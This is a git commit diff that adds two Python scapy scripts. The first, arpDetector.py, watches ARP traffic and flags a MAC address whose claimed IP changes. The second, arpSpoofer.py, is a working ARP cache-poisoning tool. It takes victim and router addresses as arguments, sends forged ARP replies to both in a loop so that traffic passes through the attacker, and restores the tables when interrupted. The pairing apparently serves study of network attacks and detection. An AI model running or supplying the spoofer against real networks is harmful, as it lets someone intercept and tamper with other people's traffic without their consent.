commit 100fd723fab6808c5fb44193cf807d6ad8afc570 Author: Sergiusz404_PJSEC Date: Sun Feb 1 11:48:47 2026 +0000 Upload files to "/" diff --git a/arpDetector.py b/arpDetector.py new file mode 100644 index 0000000..db58a3d --- /dev/null +++ b/arpDetector.py @@ -0,0 +1,20 @@ +from scapy.all import sniff +IP_MAC_Map = {} + +def processPacket(packet): + src_IP = packet['ARP'].psrc + src_MAC = packet['Ether'].src + if src_MAC in IP_MAC_Map.keys(): + if IP_MAC_Map[src_MAC] != src_IP : + try: + old_IP = IP_MAC_Map[src_MAC] + except: + old_IP = "unknown" + message = ("\n Possible ARP attack detected \n " + + " It is possible that the machine with IP address \n " + str(src_IP) + " is pretending to be " + + str(old_IP) + "\n ") + return message + else: + IP_MAC_Map[src_MAC] = src_IP + +sniff(count=0, filter="arp", store = 0, prn = processPacket) diff --git a/arpSpoofer.py b/arpSpoofer.py new file mode 100644 index 0000000..bd7fab7 --- /dev/null +++ b/arpSpoofer.py @@ -0,0 +1,36 @@ +from scapy.all import * +import sys + +my_mac = get_if_hwaddr("eth0") + +def arp_spoof(dest_ip, dest_mac, source_ip): + packet = ARP(op = "is-at",hwsrc = my_mac, psrc = source_ip, + hwdst = dest_mac, pdst = dest_ip) + send(packet, verbose = False) + +def arp_restore(dest_ip, dest_mac, source_ip, source_mac): + packet = ARP(op = "is-at", hwsrc = source_mac, psrc = source_ip, + hwdst = dest_mac, pdst = dest_ip) + send(packet, verbose = False) + +def main(): + victim_ip = sys.argv[1] + router_ip = sys.argv[2] + victim_mac = getmacbyip(victim_ip) + router_mac = getmacbyip(router_ip) + print("victim_mac =", victim_mac) + print("router_mac =", router_mac) + + + try: + print("Sending spoofed ARP packets") + while True: + + arp_spoof(victim_ip, victim_mac, router_ip) + arp_spoof(router_ip, router_mac, victim_ip) + except KeyboardInterrupt: + print("Restoring ARP Tables") + arp_restore(router_ip, router_mac, victim_ip, victim_mac) + arp_restore(victim_ip, victim_mac, router_ip, router_mac) + quit() +main()